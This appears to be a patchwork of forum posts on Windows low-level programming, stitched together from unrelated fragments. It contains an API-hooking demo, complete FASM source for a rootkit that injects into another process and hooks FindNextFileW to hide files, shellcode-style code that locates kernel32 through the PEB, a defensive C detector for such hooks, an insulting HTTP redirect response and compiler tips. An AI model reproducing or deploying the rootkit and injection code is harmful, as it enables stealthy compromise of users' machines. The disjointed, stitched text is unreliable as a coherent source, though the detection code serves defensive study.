The keylogger probably used a keyboard hook and not the ancient GetAsyncKeyState.
These days you can't write a 2-line program, because such programs are also used by all kinds of pseudo-viruses that get detected by all the pseudo-antiviruses. If anyone thinks this little program is infected or does who knows what nonsense (although I don't see what it could do), they are free to analyze the program, disassemble it, whatever.
Arhitectura calculatorului (sau sistemelor de calcul) - Adrian Atanasiu, Ed. Infodata
Programarea procesoarelor Intel (I think) - Vasile Lungu, Ed. Teora
Books are the best way to learn, but there are good tutorials too. I do ASM at university (Computer Systems Architecture course, University of Bucharest, Computer Science).
Credits: Alan
Website: Ellicit.org

.486
.MODEL FLAT, STDCALL
OPTION CASEMAP:NONE

INCLUDE C:\masm32\include\windows.inc
INCLUDE C:\masm32\include\kernel32.inc
INCLUDE C:\masm32\include\user32.inc
INCLUDELIB C:\masm32\lib\kernel32.lib
INCLUDELIB C:\masm32\lib\user32.lib

.DATA
LibName DB 'user32.dll', 0
APIName DB 'MessageBoxA', 0

.DATA?
OgMessageBoxA DD ?

.CODE
HookAPI PROC Origin:DWORD, Destination:DWORD, CodeLength:DWORD
    LOCAL Protection:DWORD
    PUSH ESI
    PUSH EDI
    INVOKE VirtualProtect, Origin, CodeLength, PAGE_READWRITE, ADDR Protection
    MOV EAX, CodeLength
    ADD EAX, 5h
    INVOKE VirtualAlloc, NULL, EAX, MEM_RESERVE or MEM_COMMIT, PAGE_EXECUTE_READWRITE
    PUSH EAX
    MOV EDI, EAX
    MOV ESI, Origin
    MOV ECX, CodeLength
    REP MOVSB
    MOV BYTE PTR [EDI], 0E9h
    MOV ECX, Origin
    SUB ECX, EAX
    SUB ECX, 5h
    MOV [EDI + 1h], ECX
    MOV EDI, Origin
    MOV BYTE PTR [EDI], 0E9h
    MOV ECX, Destination
    SUB ECX, Origin
    SUB ECX, 5h
    MOV [EDI + 1h], ECX
    INVOKE VirtualProtect, Origin, CodeLength, Protection, ADDR Protection
    POP EAX
    POP EDI
    POP ESI
    RET
HookAPI ENDP

HkMessageBoxA PROC hWnd:DWORD, lpText:DWORD, lpCaption:DWORD, uType:DWORD
    .IF uType == NULL        ; If user application provides NULL/MB_OK we will give them a nice icon too
        PUSH MB_ICONEXCLAMATION
    .ELSE
        PUSH uType
    .ENDIF
    PUSH lpCaption
    PUSH lpText
    PUSH hWnd
    CALL OgMessageBoxA       ; EAX holds result, we could change it here if we wished before returning to the user application
    RET
HkMessageBoxA ENDP

ENTRY:
    INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL   ; Non hooked MessageBoxA works as programmer made it
    INVOKE LoadLibraryA, OFFSET LibName
    INVOKE GetProcAddress, EAX, OFFSET APIName
    INVOKE HookAPI, EAX, OFFSET HkMessageBoxA, 0Bh
    MOV OgMessageBoxA, EAX   ; Remember to save the offset for the hooked function to call the original
    INVOKE MessageBoxA, NULL, OFFSET APIName, OFFSET LibName, NULL   ; Hooked MessageBoxA with our evil icon adding patch
    INVOKE ExitProcess, NULL
END ENTRY

COMMENT ^
Win2000SP4.USER32!MessageBoxA
77E38098 > 55                PUSH EBP
77E38099   8BEC              MOV EBP,ESP
77E3809B   51                PUSH ECX
77E3809C   833D 3892E677 00  CMP DWORD PTR DS:[77E69238],0
^
Author: EON - Hi, this code hooks the FindNextFileW API to hide all the files that begin with "~". Change the pid to the pid of explorer.exe to see the effect.

; *******************************************************
; *** Example of a little rootkit that hides all the  ***
; *** files that begin with "~" without using a Dll.  ***
; ***                                                 ***
; *** By E0N (L) 2008                                 ***
; *******************************************************

include 'H:\archivos de programa\fasm\include\win32ax.inc'

.data
  HookApi       db 'FindNextFileW', 0   ; Name of the api to hook
  HookDll       db 'Kernel32.dll', 0    ; Name of the DLL that contains it
  DirApi        dd ?                    ; Address of the api to hook
  process       dd ?
  pid           dd 2160                 ; PID of the process to hook
  x             dd 7                    ; Number of bytes the api has at its beginning
  BufferCall    dd ?                    ; Buffer to call the api (in our process)
  inyBufferCall dd ?                    ; Pointer to the buffer to call the api when injected
  tamFun        dd ?                    ; Size of the function that will replace the api
  inyFun        dd ?                    ; Pointer to this buffer when injected
  BufferApi     dd ?                    ; 5 byte buffer to replace the beginning of the api

  struct Datos
    sBufferCall dd ?                    ; Pointer to inyBufferCall so the original api can be called
  ends

  dat Datos ?
  SizeofDatos   dd 4
  dirStruct     dd ?                    ; Pointer to the structure when injected
  Prote         dd ?                    ; To call VirtualProtect

.code
start:
  ; Get handle of the process we will inject into
  mov eax, PROCESS_VM_OPERATION
  or eax, PROCESS_VM_WRITE
  invoke OpenProcess, eax, FALSE, [pid]
  mov [process], eax

  ; Get address of the api to hook
  invoke GetModuleHandle, HookDll
  invoke GetProcAddress, eax, HookApi
  mov [DirApi], eax

  ; Make the buffer to call the api:
  ;   x bytes              | 1 byte      | 4 bytes    | 1 byte
  ;   x first bytes of api | push [0x68] | DirApi + x | ret [0xC3]
  mov eax, dword [x]
  add eax, 6
  invoke LocalAlloc, LPTR, eax                        ; eax = x + 6
  mov [BufferCall], eax
  invoke RtlMoveMemory, [BufferCall], [DirApi], [x]   ; Copy the first x bytes of the api
  mov eax, [BufferCall]
  add eax, [x]
  mov byte [eax], 0x68
  inc eax
  mov ebx, [DirApi]
  add ebx, [x]
  mov dword [eax], ebx
  add eax, 4
  mov byte [eax], 0xC3

  ; Inject this buffer
  mov eax, MEM_RESERVE                                ; eax = MEM_RESERVE | MEM_COMMIT
  or eax, MEM_COMMIT
  mov ecx, [x]                                        ; ecx = x + 6
  add ecx, 6
  invoke VirtualAllocEx, [process], 0, ecx, eax, PAGE_READWRITE
  mov [inyBufferCall], eax
  mov ebx, [x]                                        ; ebx = x + 6
  add ebx, 6
  invoke WriteProcessMemory, [process], [inyBufferCall], [BufferCall], ebx, NULL

  ; Initialize the structure
  mov eax, [inyBufferCall]                            ; Store the pointer to the buffer used to call
  mov [dat.sBufferCall], eax                          ; the original api normally

  ; Inject the structure
  mov eax, MEM_RESERVE
  or eax, MEM_COMMIT
  invoke VirtualAllocEx, [process], 0, [SizeofDatos], eax, PAGE_READWRITE
  mov [dirStruct], eax
  invoke WriteProcessMemory, [process], [dirStruct], dat, [SizeofDatos], NULL

  ; Change the 0x0000 for a pointer to the structure
  mov ebx, CAMBIO                                     ; ebx = the 0x0000 that has to be patched (4 bytes)
  sub ebx, 4
  invoke VirtualProtect, ebx, 6, PAGE_EXECUTE_READWRITE, Prote
  invoke RtlMoveMemory, ebx, dirStruct, 4

  ; Calculate the size of the function to inject
  mov eax, FIN_MyFindNextFileW
  sub eax, MyFindNextFileW
  mov [tamFun], eax

  ; Inject the function
  mov eax, MEM_RESERVE                                ; eax = MEM_RESERVE | MEM_COMMIT
  or eax, MEM_COMMIT
  invoke VirtualAllocEx, [process], 0, [tamFun], eax, PAGE_EXECUTE_READWRITE
  mov [inyFun], eax
  invoke WriteProcessMemory, [process], [inyFun], MyFindNextFileW, [tamFun], NULL

  ; Make a buffer to hook the api
  ;   1 byte     | 4 bytes
  ;   jmp [0xE9] | Size of jump
  invoke LocalAlloc, LPTR, 5
  mov [BufferApi], eax
  mov byte [eax], 0xE9
  inc eax
  mov ebx, [inyFun]
  sub ebx, [DirApi]
  sub ebx, 5                                          ; 5 = 1 for the 0xE9 and 4 for the address
  mov dword [eax], ebx

  ; Inject this buffer at the beginning of the api
  mov eax, MEM_RESERVE                                ; eax = MEM_RESERVE | MEM_COMMIT
  or eax, MEM_COMMIT
  invoke VirtualAllocEx, [process], [DirApi], 5, eax, PAGE_EXECUTE_READWRITE
  invoke WriteProcessMemory, [process], [DirApi], [BufferApi], 5, NULL
  invoke ExitProcess, 0

; Function that will replace the api
proc MyFindNextFileW hFindFile, lpFindFileData
  OK:
  mov ebx, 0x0000                                     ; This 0x0000 will become a pointer to the buffer before injecting
  CAMBIO:
  push [lpFindFileData]
  push [hFindFile]
  call dword [ebx]
  mov ebx, eax
  cmp ebx, 0
  je RETORNAR_FIN
  mov eax, [lpFindFileData]
  ; add eax, 44
  cmp byte [eax], '~'
  je OK
  mov eax, 1
  ret
  RETORNAR_FIN:
  mov eax, 0
  ret
endp
FIN_MyFindNextFileW:

.end start

In conclusion, it is a little rootkit without a DLL.
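A defender-side check for the detour pattern both posts above install (a 5-byte E9 jmp, or a push/ret stub, written over an export's first bytes), as an added example that is not part of either post: it parses the prologue bytes, recovers the absolute target and flags a target that leaves the exporting module. The MessageBoxA address and clean bytes come from the disassembly quoted in the first post; the module base and size and the hooked bytes are constructed.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* What the first bytes of an exported function look like. */
typedef enum { PROLOGUE_CLEAN = 0, PROLOGUE_JMP_REL32, PROLOGUE_PUSH_RET } prologue_kind;

typedef struct {
    prologue_kind kind;
    uint32_t target;      /* absolute address the detour transfers to, 0 when clean */
    int outside_module;   /* 1 when target lies outside [mod_base, mod_base + mod_size) */
} hook_report;

static uint32_t le32(const uint8_t *p) {          /* little-endian dword read */
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Inspect `len` bytes read from virtual address func_va. The exporting module's range lets a
 * detour that leaves the module (what both posts above write into the API) be flagged. */
hook_report inspect_prologue(const uint8_t *code, size_t len, uint32_t func_va,
                             uint32_t mod_base, uint32_t mod_size) {
    hook_report r = { PROLOGUE_CLEAN, 0, 0 };
    if (len >= 5 && code[0] == 0xE9) {            /* E9 rel32: jmp relative to next instruction */
        r.kind = PROLOGUE_JMP_REL32;
        r.target = func_va + 5 + le32(code + 1);  /* 32-bit wrap-around is intended */
    } else if (len >= 6 && code[0] == 0x68 && code[5] == 0xC3) { /* 68 imm32 / C3: push-ret */
        r.kind = PROLOGUE_PUSH_RET;
        r.target = le32(code + 1);
    }
    if (r.kind != PROLOGUE_CLEAN)
        r.outside_module = !(r.target >= mod_base && r.target - mod_base < mod_size);
    return r;
}

int main(void) {
    /* Bytes quoted in the first post's disassembly of Win2000 SP4 USER32!MessageBoxA at 77E38098 */
    static const uint8_t clean[] = { 0x55, 0x8B, 0xEC, 0x51, 0x83, 0x3D, 0x38, 0x92, 0xE6, 0x77, 0x00 };
    /* Constructed: same entry after a detour to 0x00401000 (rel32 = 0x00401000 - 0x77E3809D) */
    static const uint8_t hooked[] = { 0xE9, 0x63, 0x8F, 0x5C, 0x88, 0x3D, 0x38, 0x92, 0xE6, 0x77, 0x00 };
    const uint32_t func = 0x77E38098, base = 0x77E10000, size = 0x60000; /* base/size constructed */
    hook_report a = inspect_prologue(clean, sizeof clean, func, base, size);
    hook_report b = inspect_prologue(hooked, sizeof hooked, func, base, size);
    printf("clean : kind=%d\n", a.kind);
    printf("hooked: kind=%d target=%08X outside_module=%d\n", b.kind, b.target, b.outside_module);
    return 0;
}
```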
Credits : HUTCH for the StringCompare function
          PHRACK for the tip on retrieving K32
Reference : NEITSA for the methodology
Author: steve10120

    call .hwndDelta
.hwndDelta:
    pop ebp
    sub ebp, .hwndDelta

.find_kernel:
    mov eax, [fs:30h]                   ; EAX = PEB base
    mov eax, [eax + 0ch]                ; EAX = PEB_LDR_DATA
    mov esi, [eax + 1ch]                ; first entry in InInitializationOrderModuleList
    lodsd                               ; forward to next LIST_ENTRY
    mov ebx, [eax + 08h]                ; EBX = Kernel32 base memory
    mov [ebp + _kernelBase], ebx
    mov esi, dword [ebx + 3Ch]          ; ESI = PE MAGIC
    add esi, [ebp + _kernelBase]
    mov edx, [esi + 078h]               ; EDX = RVA of the export table
    add edx, [ebp + _kernelBase]        ; EDX = VA of the export table
    mov ecx, [edx + 018h]               ; ECX = number of exports of the DLL
    mov [ebp + _function_nb], ecx
    mov ebx, [edx + 020h]               ; EBX = RVA of the name pointer table
    add ebx, 4
    add ebx, [ebp + _kernelBase]        ; EBX = VA of the export name table
    ; From here on we have every element needed to look up the functions

    ; Retrieve GetProcAddress
    pushad
    lea edi, [ebp + _szGetProcAddress]  ; EDI = GetProcAddress string
    call .find_function
    mov [ebp + _getProcAddress], eax
    popad
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    ; Retrieve LoadLibrary
    pushad
    lea edi, [ebp + _szLoadLibrary]     ; EDI = LoadLibraryA string
    call .find_function
    mov [ebp + _loadLibrary], eax
    popad
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

    ; TEST MESSAGEBOX
    lea ebx, [ebp + _szUser32]
    push ebx
    call [ebp + _loadLibrary]

    lea ebx, [ebp + _szMessageBox]
    push ebx
    push eax
    lea edx, [ebp + _getProcAddress]
    call dword [edx]

    push 0
    lea esi, [ebp + _szGetProcAddress]
    push esi
    lea edi, [ebp + _szGetProcAddress]
    push edi
    push 0
    call eax
    ;;;;;;;;;;;;;;;;
    ret

.find_function:
.find_function_loop:
    mov esi, dword [ebx]                ; ESI = RVA of the function name string
    add ebx, 4
    add esi, [ebp + _kernelBase]        ; ESI = VA of the function name string
    dec ecx                             ; ECX = ECX - 1
    call .stringCompare
    cmp eax, -1
    je .find_function_loop
    mov ebx, [edx + 01ch]               ; EBX = RVA of the export address table
    add ebx, [ebp + _kernelBase]        ; pointer to the export address table
    mov edx, dword [_function_nb]
    sub edx, ecx
    imul edx, edx, 4
    add ebx, edx
    mov eax, ebx
    mov eax, dword [eax]
    add eax, [ebp + _kernelBase]
    ret

.stringCompare:
    pushad
    mov ecx, esi
    mov edx, edi
.cmst:
    mov al, [ecx]
    cmp al, [edx]
    jne .no_match
    add ecx, 1
    add edx, 1
    test al, al
    jne .cmst
    popad
    xor eax, eax
    ret
.no_match:
    popad
    mov eax, -1
    ret

_szGetProcAddress db "GetProcAddress", 0
_szLoadLibrary    db "LoadLibraryA", 0
_kernelBase       dd ?
_function_nb      dd ?
_szMessageBox     db "MessageBoxA", 0
_szUser32         db "user32.dll", 0
_getProcAddress   dd ?
_loadLibrary      dd ?
Binary Code Modification [Patching Vulnerabilities]
Download: http://www.securityarchitect.org/binary-english.pdf
What exactly? That it redirects you to a long link? One lousy line of code.

HTTP/1.1 302 Found
Connection: close
Date: Fri, 22 Oct 2010 19:32:30 GMT
Location: You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/You/Suck/Ass/You/Suck/Ass
Server: Apache/2.2.9 (Debian) PHP/5.2.14-0.dotdeb.0 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Client-Date: Fri, 22 Oct 2010 19:32:30 GMT
Client-Peer:
Client-Response-Num: 1
Client-Warning: Redirect loop detected (max_redirect = 7)
X-Powered-By: PHP/5.2.14-0.dotdeb.0

The HTTP headers. A Location...
On Linux you use the GNU compilers: gcc and g++. Careful, if you are used to working with Borland C you will need to make some changes; the language is no longer quite what it was 20 years ago when that compiler appeared. On Windows you use CodeBlocks or DevC++. The compiler used by both is MinGW, the Windows port of the GNU compilers. Read the error messages and warnings carefully, and search for them on Google if you don't understand what they mean.
